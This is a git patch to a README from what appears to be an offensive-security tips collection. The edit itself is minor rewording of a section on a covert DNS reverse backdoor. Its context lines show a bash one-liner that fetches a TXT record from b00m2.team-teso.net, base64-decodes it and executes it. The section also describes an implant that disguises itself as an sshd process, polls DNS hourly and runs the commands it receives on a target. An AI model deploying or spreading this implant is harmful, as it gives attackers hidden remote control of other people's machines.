From ed79114848915fe47a0247279b7a858e8be95d55 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 6 May 2025 14:13:09 +0100 Subject: [PATCH] Update README.md --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 05d857b..11ca032 100644 --- a/README.md +++ b/README.md @@ -1870,11 +1870,12 @@ bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 ``` An elaborate DNS reverse backdoor (as a daemon and living-off-the-land): +- Depends on bash, dig and base64 only. - Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups` -- Requests a TXT record every 60 minutes (from b00m2.team-teso.net). -- Base64-decode the TXT record and execute the command on the target. +- Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net). +- Base64-decodes the TXT record and executes the command on the target. -1. Modify the following to your liking and then Cut & Paste it to get the 1-line implant. +1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant. ```shell base64 -w0 >x.txt <<-'EOF' @@ -1893,7 +1894,7 @@ EOF echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $(